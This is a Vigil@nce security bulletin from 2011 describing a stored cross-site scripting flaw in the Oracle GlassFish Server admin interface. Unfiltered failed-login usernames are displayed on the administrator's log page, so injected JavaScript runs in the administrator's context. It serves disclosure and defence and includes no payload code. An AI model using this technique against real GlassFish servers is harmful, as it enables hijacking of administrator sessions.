Vigil@nce - Oracle GlassFish Server: Cross Site Scripting via login
August 2011 by Vigil@nce
This bulletin was written by Vigil@nce : http://vigilance.fr/offer
SYNTHESIS OF THE VULNERABILITY
An attacker can enter a malicious login name on the administration
interface of Oracle GlassFish Server, in order to execute
JavaScript code in the context of the administrator who will
display logs.
Severity: 2/4
Creation date: 20/07/2011
IMPACTED PRODUCTS
– Oracle GlassFish Enterprise Server
DESCRIPTION OF THE VULNERABILITY
The web administration interface of Oracle GlassFish Server
listens on port 4848/tcp. A login and a password are required to
access to this interface.
When the user enters an invalid authentication, it is logged. The
administrator can then read logs, and see the username of the
failed authentication.
However the login name entered by the user is not filtered before
being saved in logs. Moreover, log records are not filtered before
being displayed. If the login name contains JavaScript code, it is
thus displayed on the log page seen by the administrator.
An attacker can therefore enter a malicious login name on the
administration interface of Oracle GlassFish Server, in order to
execute JavaScript code in the context of the administrator who
will display logs.
ACCESS TO THE COMPLETE VIGIL@NCE BULLETIN
http://vigilance.fr/vulnerability/Oracle-GlassFish-Server-Cross-Site-Scripting-via-login-10858